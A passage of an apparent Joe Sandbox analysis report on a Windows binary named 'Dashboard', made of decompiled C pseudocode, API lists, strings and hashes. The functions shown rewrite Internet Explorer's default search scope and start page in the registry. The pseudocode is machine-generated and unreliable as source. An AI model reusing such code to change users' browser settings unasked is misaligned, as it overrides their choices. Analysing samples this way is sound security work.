                                                                                                                    0x01010da3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010dbc
                                                                                                                    0x01010dbe
                                                                                                                    0x01010dc0
                                                                                                                    0x01010e0b
                                                                                                                    0x01010e0b
                                                                                                                    0x01010e13
                                                                                                                    0x01010e13
                                                                                                                    0x01010e13
                                                                                                                    0x01010e19
                                                                                                                    0x00000000
                                                                                                                    0x01010e19
                                                                                                                    0x01010dc2
                                                                                                                    0x01010dca
                                                                                                                    0x01010dda
                                                                                                                    0x01010de9
                                                                                                                    0x01010deb
                                                                                                                    0x01010df0
                                                                                                                    0x01010df2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010dfa
                                                                                                                    0x01010e00
                                                                                                                    0x01010e04
                                                                                                                    0x01010e08
                                                                                                                    0x01010e08
                                                                                                                    0x00000000
                                                                                                                    0x01010e04
                                                                                                                    0x01010d87
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01010CC1
                                                                                                                      • Part of subcall function 0100C55B: RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 0100C584
                                                                                                                      • Part of subcall function 0100653B: __EH_prolog3.LIBCMT ref: 01006542
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,?), ref: 010106E0
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?), ref: 01010714
                                                                                                                      • Part of subcall function 010106BB: ??_V@YAXPAX@Z.MSVCR80 ref: 01010730
                                                                                                                    • _wcsicmp.MSVCR80 ref: 01010DFA
                                                                                                                    Strings
                                                                                                                    • Version, xrefs: 01010D37
                                                                                                                    • Software\Microsoft\Internet Explorer\SearchScopes, xrefs: 01010DAA
                                                                                                                    • DefaultScope, xrefs: 01010DC2
                                                                                                                    • search.live.com, xrefs: 01010D95
                                                                                                                    • Software\Microsoft\Internet Explorer, xrefs: 01010D09
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3Value$Create_wcsicmp
                                                                                                                    • String ID: DefaultScope$Software\Microsoft\Internet Explorer$Software\Microsoft\Internet Explorer\SearchScopes$Version$search.live.com
                                                                                                                    • API String ID: 2459908085-109992249
                                                                                                                    • Opcode ID: 39d4ce0c0504623c10ed6bcf8ed57d580ccf4a711cdf64ef239f728181f1044f
                                                                                                                    • Instruction ID: da91692fbf1bbc0728a7f2577692d3937b43c81839a1a500042604c73adfadcd
                                                                                                                    • Opcode Fuzzy Hash: 39d4ce0c0504623c10ed6bcf8ed57d580ccf4a711cdf64ef239f728181f1044f
                                                                                                                    • Instruction Fuzzy Hash: 7841B47190015AAAEF22EBE9CD54AEEBBB4AF29320F100159F2D1B32C5DB750A44C765
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E01010B31(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t48;
                                                                                                                    				void* _t59;
                                                                                                                    				long _t63;
                                                                                                                    				long _t64;
                                                                                                                    				void* _t87;
                                                                                                                    				void* _t95;
                                                                                                                    
                                                                                                                    				_t87 = __edx;
                                                                                                                    				_push(0x24);
                                                                                                                    				E0100880F(E010162B4, __ebx, __edi, __esi);
                                                                                                                    				 *(_t95 - 0x10) = 0;
                                                                                                                    				 *(_t95 - 0x14) = 0;
                                                                                                                    				 *((intOrPtr*)(_t95 - 4)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t95 - 0x20)) = 0;
                                                                                                                    				 *((char*)(_t95 - 4)) = 1;
                                                                                                                    				E01004D33(_t95 - 0x1c, 0x101a5f0);
                                                                                                                    				 *((char*)(_t95 - 4)) = 2;
                                                                                                                    				E01004D33(_t95 - 0x28, 0x101a5f0);
                                                                                                                    				 *((char*)(_t95 - 4)) = 3;
                                                                                                                    				E01004D33(_t95 - 0x18, 0x101a5f0);
                                                                                                                    				 *((char*)(_t95 - 4)) = 4;
                                                                                                                    				 *((short*)(_t95 - 0x30)) = 0;
                                                                                                                    				 *((short*)(_t95 - 0x2e)) = 0;
                                                                                                                    				 *((short*)(_t95 - 0x2c)) = 0;
                                                                                                                    				 *((short*)(_t95 - 0x2a)) = 0;
                                                                                                                    				_t48 = E0100C55B(_t95 - 0x20, 0x80000002, L"Software\\Microsoft\\Internet Explorer", 0, 0, 0x2001f, 0, 0);
                                                                                                                    				_t97 = _t48;
                                                                                                                    				if(_t48 == 0) {
                                                                                                                    					_push(L"Version");
                                                                                                                    					E0100653B(__ebx, _t95 - 0x24, 0x2001f, 0, _t97);
                                                                                                                    					 *((char*)(_t95 - 4)) = 5;
                                                                                                                    					_t59 = E010106BB( *((intOrPtr*)(_t95 - 0x20)), _t95 - 0x24, _t95 - 0x18);
                                                                                                                    					_t68 = _t59;
                                                                                                                    					 *((char*)(_t95 - 4)) = 4;
                                                                                                                    					E01004925( *(_t95 - 0x24) + 0xfffffff0, _t87);
                                                                                                                    					if(_t59 == 0) {
                                                                                                                    						E0100CB8C(_t95 - 0x30,  *((intOrPtr*)(_t95 - 0x18)), 2);
                                                                                                                    						if( *((short*)(_t95 - 0x30)) == 7) {
                                                                                                                    							_push(_t95 - 0x1c);
                                                                                                                    							_push(L"search.live.com");
                                                                                                                    							_t63 = E010109AF(_t68, _t87, 0x2001f, 0, __eflags);
                                                                                                                    							__eflags = _t63;
                                                                                                                    							 *(_t95 - 0x10) = _t63;
                                                                                                                    							if(_t63 == 0) {
                                                                                                                    								_t64 = E0100C55B(_t95 - 0x14, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\SearchScopes", 0, 0, 0x2001f, 0, 0);
                                                                                                                    								__eflags = _t64;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									L8:
                                                                                                                    									if(__eflags > 0) {
                                                                                                                    										_t64 = _t64 & 0x0000ffff | 0x80070000;
                                                                                                                    										__eflags = _t64;
                                                                                                                    									}
                                                                                                                    									 *(_t95 - 0x10) = _t64;
                                                                                                                    								} else {
                                                                                                                    									_t64 = E0100C684(_t95 - 0x14, L"DefaultScope",  *((intOrPtr*)(_t95 - 0x1c)), 1);
                                                                                                                    									__eflags = _t64;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										goto L8;
                                                                                                                    									} else {
                                                                                                                    										 *(_t95 - 0x24) = 1;
                                                                                                                    										_t64 = RegSetValueExW( *(_t95 - 0x14), L"Version", 0, 4, _t95 - 0x24, 4);
                                                                                                                    										__eflags = _t64;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											goto L8;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							 *(_t95 - 0x10) = 0x80004005;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				E01004925( *((intOrPtr*)(_t95 - 0x18)) + 0xfffffff0, _t87);
                                                                                                                    				E01004925( *((intOrPtr*)(_t95 - 0x28)) + 0xfffffff0, _t87);
                                                                                                                    				E01004925( *((intOrPtr*)(_t95 - 0x1c)) + 0xfffffff0, _t87);
                                                                                                                    				E0100C53D(_t95 - 0x20);
                                                                                                                    				E0100C53D(_t95 - 0x14);
                                                                                                                    				return E010088FB( *(_t95 - 0x10));
                                                                                                                    			}









                                                                                                                    0x01010b31
                                                                                                                    0x01010b31
                                                                                                                    0x01010b38
                                                                                                                    0x01010b3f
                                                                                                                    0x01010b42
                                                                                                                    0x01010b45
                                                                                                                    0x01010b48
                                                                                                                    0x01010b54
                                                                                                                    0x01010b58
                                                                                                                    0x01010b61
                                                                                                                    0x01010b65
                                                                                                                    0x01010b6e
                                                                                                                    0x01010b72
                                                                                                                    0x01010b8e
                                                                                                                    0x01010b92
                                                                                                                    0x01010b96
                                                                                                                    0x01010b9a
                                                                                                                    0x01010b9e
                                                                                                                    0x01010ba2
                                                                                                                    0x01010ba7
                                                                                                                    0x01010ba9
                                                                                                                    0x01010baf
                                                                                                                    0x01010bb7
                                                                                                                    0x01010bc7
                                                                                                                    0x01010bcb
                                                                                                                    0x01010bd6
                                                                                                                    0x01010bd8
                                                                                                                    0x01010bdc
                                                                                                                    0x01010be3
                                                                                                                    0x01010bf1
                                                                                                                    0x01010bfb
                                                                                                                    0x01010c09
                                                                                                                    0x01010c0a
                                                                                                                    0x01010c0f
                                                                                                                    0x01010c14
                                                                                                                    0x01010c16
                                                                                                                    0x01010c19
                                                                                                                    0x01010c2d
                                                                                                                    0x01010c32
                                                                                                                    0x01010c34
                                                                                                                    0x01010c6c
                                                                                                                    0x01010c6c
                                                                                                                    0x01010c73
                                                                                                                    0x01010c73
                                                                                                                    0x01010c73
                                                                                                                    0x01010c78
                                                                                                                    0x01010c36
                                                                                                                    0x01010c45
                                                                                                                    0x01010c4a
                                                                                                                    0x01010c4c
                                                                                                                    0x00000000
                                                                                                                    0x01010c4e
                                                                                                                    0x01010c5f
                                                                                                                    0x01010c62
                                                                                                                    0x01010c68
                                                                                                                    0x01010c6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010c6a
                                                                                                                    0x01010c4c
                                                                                                                    0x01010c34
                                                                                                                    0x01010bfd
                                                                                                                    0x01010bfd
                                                                                                                    0x01010bfd
                                                                                                                    0x01010bfb
                                                                                                                    0x01010be3
                                                                                                                    0x01010c81
                                                                                                                    0x01010c8c
                                                                                                                    0x01010c97
                                                                                                                    0x01010c9f
                                                                                                                    0x01010ca7
                                                                                                                    0x01010cb4

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01010B38
                                                                                                                      • Part of subcall function 0100C55B: RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 0100C584
                                                                                                                      • Part of subcall function 0100653B: __EH_prolog3.LIBCMT ref: 01006542
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,?), ref: 010106E0
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?), ref: 01010714
                                                                                                                      • Part of subcall function 010106BB: ??_V@YAXPAX@Z.MSVCR80 ref: 01010730
                                                                                                                    • RegSetValueExW.ADVAPI32(?,Version,00000000,00000004,?,00000004,search.live.com,?), ref: 01010C62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$H_prolog3$Create
                                                                                                                    • String ID: DefaultScope$Software\Microsoft\Internet Explorer$Software\Microsoft\Internet Explorer\SearchScopes$Version$search.live.com
                                                                                                                    • API String ID: 120277328-109992249
                                                                                                                    • Opcode ID: 95c97ba9765c4079a63bbdd3128ccb205dd6202ad9ffeadd15bc1b53c6cbd093
                                                                                                                    • Instruction ID: 18264d3b9551ec9fb9b8377ce051fc4fd5f89498e1e5bf640c1f9694bde7e341
                                                                                                                    • Opcode Fuzzy Hash: 95c97ba9765c4079a63bbdd3128ccb205dd6202ad9ffeadd15bc1b53c6cbd093
                                                                                                                    • Instruction Fuzzy Hash: 8F419370D1125AAAEF22EBA8CD54AEEBBB4EF29710F100159F2D1B22C4D7750744CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 62%
                                                                                                                    			E0100D3CE(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				void* _t24;
                                                                                                                    				void* _t25;
                                                                                                                    				char _t36;
                                                                                                                    
                                                                                                                    				if(_a8 == 0 || _a12 == 0) {
                                                                                                                    					return 0x80070057;
                                                                                                                    				}
                                                                                                                    				_t36 = _a4;
                                                                                                                    				__imp__?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ();
                                                                                                                    				if(__eax == 0) {
                                                                                                                    					L8:
                                                                                                                    					return 0x8000ffff;
                                                                                                                    				}
                                                                                                                    				__imp__?StrToID@DirectUI@@YGGPB_W@Z(__eax);
                                                                                                                    				if(E0100C2F9(__eax, __eax, L"idProductListCont") == 0 ||  *((intOrPtr*)(_t36 - 4)) == 0) {
                                                                                                                    					goto L8;
                                                                                                                    				}
                                                                                                                    				_a4 = 0;
                                                                                                                    				_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 - 4)) + 0xc))))(L"ProductLine",  &_a4, 0);
                                                                                                                    				if(_t24 >= 0) {
                                                                                                                    					if(_a4 == 0) {
                                                                                                                    						goto L8;
                                                                                                                    					}
                                                                                                                    					_t25 = E0100D10E(L"ProductNameText", _a4);
                                                                                                                    					_t37 = _t25;
                                                                                                                    					if(_t25 == 0) {
                                                                                                                    						goto L8;
                                                                                                                    					}
                                                                                                                    					_t24 = E0100C887(_t25, _t37, _a12);
                                                                                                                    					if(_t24 >= 0) {
                                                                                                                    						_t24 = E0100C964(_t24, _t37, _a12);
                                                                                                                    						if(_t24 >= 0) {
                                                                                                                    							if(_a16 != 0) {
                                                                                                                    								L13:
                                                                                                                    								_t24 = E0100C91D(_t24, _a4, _a8);
                                                                                                                    								if(_t24 >= 0) {
                                                                                                                    									__imp__?Add@Element@DirectUI@@QAEJPAV12@@Z(_a4);
                                                                                                                    									return _t24;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								_t24 = E0100C8D2(_t24, _t37, L"UnlaunchableProductNameText");
                                                                                                                    								if(_t24 >= 0) {
                                                                                                                    									goto L13;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return _t24;
                                                                                                                    			}






                                                                                                                    0x0100d3db
                                                                                                                    0x00000000
                                                                                                                    0x0100d49e
                                                                                                                    0x0100d3ea
                                                                                                                    0x0100d3f0
                                                                                                                    0x0100d3f8
                                                                                                                    0x0100d44a
                                                                                                                    0x00000000
                                                                                                                    0x0100d44a
                                                                                                                    0x0100d400
                                                                                                                    0x0100d410
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d422
                                                                                                                    0x0100d42c
                                                                                                                    0x0100d430
                                                                                                                    0x0100d435
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d43f
                                                                                                                    0x0100d444
                                                                                                                    0x0100d448
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d456
                                                                                                                    0x0100d45d
                                                                                                                    0x0100d464
                                                                                                                    0x0100d46b
                                                                                                                    0x0100d470
                                                                                                                    0x0100d482
                                                                                                                    0x0100d488
                                                                                                                    0x0100d48f
                                                                                                                    0x0100d496
                                                                                                                    0x00000000
                                                                                                                    0x0100d496
                                                                                                                    0x0100d472
                                                                                                                    0x0100d479
                                                                                                                    0x0100d480
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d480
                                                                                                                    0x0100d470
                                                                                                                    0x0100d46b
                                                                                                                    0x0100d45d
                                                                                                                    0x0100d4a7

                                                                                                                    APIs
                                                                                                                    • ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE ref: 0100D3F0
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idProductListCont,00000000), ref: 0100D400
                                                                                                                      • Part of subcall function 0100C2F9: ?FindDescendent@Element@DirectUI@@QAEPAV12@G@Z.UXCORE(00000000,?,00000000,?,01012820,00000000,?,01012C67,00000000,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001), ref: 0100C30C
                                                                                                                    • ?Add@Element@DirectUI@@QAEJPAV12@@Z.UXCORE(?,?), ref: 0100D496
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Direct$Element@$Add@Descendent@Element@2@FindHost@NativeV12@V12@@
                                                                                                                    • String ID: ProductLine$ProductNameText$UnlaunchableProductNameText$idProductListCont
                                                                                                                    • API String ID: 2886039252-2033342440
                                                                                                                    • Opcode ID: 381874d1a4e7aa9c4f63e340bc0acaab1d3c72144bc70de579f6a65152f097cc
                                                                                                                    • Instruction ID: 48333047e8f2e7f5581505fc6d3df2c11f652f343825d3b2a55e7844625f4102
                                                                                                                    • Opcode Fuzzy Hash: 381874d1a4e7aa9c4f63e340bc0acaab1d3c72144bc70de579f6a65152f097cc
                                                                                                                    • Instruction Fuzzy Hash: CA219831240146ABBF23BFD9D8C88ED7BA5AB40250F15C47DFAC5861D0DE719A85C762
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E01010745(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t23;
                                                                                                                    				void* _t25;
                                                                                                                    				signed int _t28;
                                                                                                                    				void* _t47;
                                                                                                                    				void* _t52;
                                                                                                                    				signed int _t54;
                                                                                                                    				signed int _t60;
                                                                                                                    
                                                                                                                    				_t47 = __edx;
                                                                                                                    				_push(0x10);
                                                                                                                    				E0100880F(E010161B4, __ebx, __edi, __esi);
                                                                                                                    				 *(_t52 - 0x14) = 0;
                                                                                                                    				 *((intOrPtr*)(_t52 - 0x10)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                    				E01004D33(_t52 - 0x18, 0x101a5f0);
                                                                                                                    				 *((char*)(_t52 - 4)) = 1;
                                                                                                                    				 *((intOrPtr*)(_t52 - 0x1c)) = 0;
                                                                                                                    				_t23 = E0100C5B0(_t52 - 0x10, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\International", 0x20019);
                                                                                                                    				_t54 = _t23;
                                                                                                                    				if(_t54 == 0) {
                                                                                                                    					L4:
                                                                                                                    					_t25 = E0100C5EC(_t52 - 0x10, L"AcceptLanguage", 0, _t52 - 0x1c);
                                                                                                                    					if(_t25 == 0 || _t25 == 0xea) {
                                                                                                                    						_push(L"http://go.microsoft.com/fwlink/?linkid=677");
                                                                                                                    					} else {
                                                                                                                    						_push(L"http://runonce.msn.com/?v=msgrv75");
                                                                                                                    					}
                                                                                                                    					E0100628E(_t52 - 0x18, 0x80000001);
                                                                                                                    					E0100C53D(_t52 - 0x10);
                                                                                                                    					_t28 = E0100C55B(_t52 - 0x10, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Main", 0, 0, 0x2001f, 0, 0);
                                                                                                                    					if(_t28 != 0) {
                                                                                                                    						L10:
                                                                                                                    						if(_t60 > 0) {
                                                                                                                    							_t28 = _t28 & 0x0000ffff | 0x80070000;
                                                                                                                    						}
                                                                                                                    						 *(_t52 - 0x14) = _t28;
                                                                                                                    					} else {
                                                                                                                    						_t28 = E0100C684(_t52 - 0x10, L"Start Page",  *((intOrPtr*)(_t52 - 0x18)), 1);
                                                                                                                    						_t60 = _t28;
                                                                                                                    						if(_t60 != 0) {
                                                                                                                    							goto L10;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					if(_t54 > 0) {
                                                                                                                    						_t23 = _t23 & 0x0000ffff | 0x80070000;
                                                                                                                    					}
                                                                                                                    					 *(_t52 - 0x14) = _t23;
                                                                                                                    					if(_t23 >= 0) {
                                                                                                                    						goto L4;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				E01004925( *((intOrPtr*)(_t52 - 0x18)) + 0xfffffff0, _t47);
                                                                                                                    				E0100C53D(_t52 - 0x10);
                                                                                                                    				return E010088FB( *(_t52 - 0x14));
                                                                                                                    			}










                                                                                                                    0x01010745
                                                                                                                    0x01010745
                                                                                                                    0x0101074c
                                                                                                                    0x01010753
                                                                                                                    0x01010756
                                                                                                                    0x01010761
                                                                                                                    0x01010764
                                                                                                                    0x0101077c
                                                                                                                    0x01010780
                                                                                                                    0x01010783
                                                                                                                    0x01010788
                                                                                                                    0x0101078f
                                                                                                                    0x010107a1
                                                                                                                    0x010107ae
                                                                                                                    0x010107b5
                                                                                                                    0x010107c5
                                                                                                                    0x010107be
                                                                                                                    0x010107be
                                                                                                                    0x010107be
                                                                                                                    0x010107cd
                                                                                                                    0x010107d5
                                                                                                                    0x010107ec
                                                                                                                    0x010107f3
                                                                                                                    0x0101080b
                                                                                                                    0x0101080b
                                                                                                                    0x01010812
                                                                                                                    0x01010812
                                                                                                                    0x01010814
                                                                                                                    0x010107f5
                                                                                                                    0x01010802
                                                                                                                    0x01010807
                                                                                                                    0x01010809
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010809
                                                                                                                    0x01010791
                                                                                                                    0x01010791
                                                                                                                    0x01010798
                                                                                                                    0x01010798
                                                                                                                    0x0101079c
                                                                                                                    0x0101079f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101079f
                                                                                                                    0x0101081d
                                                                                                                    0x01010825
                                                                                                                    0x01010832

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0101074C
                                                                                                                      • Part of subcall function 0100C5B0: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000), ref: 0100C5CC
                                                                                                                    Strings
                                                                                                                    • Software\Microsoft\Internet Explorer\International, xrefs: 0101076E
                                                                                                                    • Software\Microsoft\Internet Explorer\Main, xrefs: 010107E3
                                                                                                                    • http://go.microsoft.com/fwlink/?linkid=677, xrefs: 010107C5
                                                                                                                    • Start Page, xrefs: 010107FD
                                                                                                                    • AcceptLanguage, xrefs: 010107A6
                                                                                                                    • http://runonce.msn.com/?v=msgrv75, xrefs: 010107BE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3Open
                                                                                                                    • String ID: AcceptLanguage$Software\Microsoft\Internet Explorer\International$Software\Microsoft\Internet Explorer\Main$Start Page$http://go.microsoft.com/fwlink/?linkid=677$http://runonce.msn.com/?v=msgrv75
                                                                                                                    • API String ID: 94179280-3469362327
                                                                                                                    • Opcode ID: 5494531869df0e860775eec5cea18b9b608a1a2ca1933ceeb8e5fc5e7f4d8457
                                                                                                                    • Instruction ID: b03cea58fb13dbe64b95bf04508e058527b1d262e75d1e3db3d68a84c6778d1e
                                                                                                                    • Opcode Fuzzy Hash: 5494531869df0e860775eec5cea18b9b608a1a2ca1933ceeb8e5fc5e7f4d8457
                                                                                                                    • Instruction Fuzzy Hash: 8721C870E5122B9AFB22EB98CD859FE7A74BF20B10F100569B1D0F61C8DA784784CBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E01014853(void* __ebx, signed int __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr _t28;
                                                                                                                    				intOrPtr _t30;
                                                                                                                    				char _t36;
                                                                                                                    				int _t41;
                                                                                                                    				intOrPtr* _t43;
                                                                                                                    				intOrPtr* _t44;
                                                                                                                    				void* _t46;
                                                                                                                    
                                                                                                                    				_push(8);
                                                                                                                    				E0100880F(E0101658F, __ebx, __edi, __esi);
                                                                                                                    				_t36 = 0;
                                                                                                                    				 *(_t46 - 0x14) = 0;
                                                                                                                    				 *((intOrPtr*)(_t46 - 4)) = 0;
                                                                                                                    				 *(_t46 - 0x10) = 0;
                                                                                                                    				_t43 =  *((intOrPtr*)(_t46 + 8));
                                                                                                                    				 *((char*)(_t46 - 4)) = 1;
                                                                                                                    				if(_t43 != 0) {
                                                                                                                    					if( *((intOrPtr*)(_t46 + 0xc)) == 0) {
                                                                                                                    						goto L1;
                                                                                                                    					} else {
                                                                                                                    						_t28 =  *((intOrPtr*)( *_t43 + 0x28))(_t43, _t46 - 0x14);
                                                                                                                    						 *((intOrPtr*)(_t46 + 8)) = _t28;
                                                                                                                    						if(_t28 >= 0) {
                                                                                                                    							_t30 =  *((intOrPtr*)( *_t43 + 0x24))(_t43, _t46 - 0x10);
                                                                                                                    							 *((intOrPtr*)(_t46 + 8)) = _t30;
                                                                                                                    							if(_t30 >= 0) {
                                                                                                                    								_t41 = __edi | 0xffffffff;
                                                                                                                    								if(CompareStringW(0, 1,  *(_t46 - 0x14), _t41,  *0x101a490, _t41) == 2 || CompareStringW(0, 1,  *(_t46 - 0x10), _t41,  *0x101a490, _t41) == 2 || CompareStringW(0, 1,  *(_t46 - 0x10), _t41,  *0x101a4ac, _t41) == 2) {
                                                                                                                    									_t36 = 1;
                                                                                                                    								}
                                                                                                                    								 *((char*)( *((intOrPtr*)(_t46 + 0xc)))) = _t36;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L10:
                                                                                                                    						_t44 = __imp__#6;
                                                                                                                    						 *_t44( *(_t46 - 0x10));
                                                                                                                    						 *_t44( *(_t46 - 0x14));
                                                                                                                    						return E010088FB( *((intOrPtr*)(_t46 + 8)));
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				L1:
                                                                                                                    				 *((intOrPtr*)(_t46 + 8)) = 0x80070057;
                                                                                                                    				goto L10;
                                                                                                                    			}










                                                                                                                    0x01014853
                                                                                                                    0x0101485a
                                                                                                                    0x0101485f
                                                                                                                    0x01014861
                                                                                                                    0x01014864
                                                                                                                    0x01014867
                                                                                                                    0x0101486a
                                                                                                                    0x0101486f
                                                                                                                    0x01014873
                                                                                                                    0x01014881
                                                                                                                    0x00000000
                                                                                                                    0x01014883
                                                                                                                    0x0101488a
                                                                                                                    0x0101488f
                                                                                                                    0x01014892
                                                                                                                    0x0101489b
                                                                                                                    0x010148a0
                                                                                                                    0x010148a3
                                                                                                                    0x010148ab
                                                                                                                    0x010148c1
                                                                                                                    0x010148ef
                                                                                                                    0x010148ef
                                                                                                                    0x010148f3
                                                                                                                    0x010148f3
                                                                                                                    0x010148a3
                                                                                                                    0x010148f5
                                                                                                                    0x010148f8
                                                                                                                    0x010148fe
                                                                                                                    0x01014903
                                                                                                                    0x0101490d
                                                                                                                    0x0101490d
                                                                                                                    0x01014881
                                                                                                                    0x01014875
                                                                                                                    0x01014875
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0101485A
                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,0000001C), ref: 010148BC
                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 010148D1
                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,?), ref: 010148E6
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 010148FE
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 01014903
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
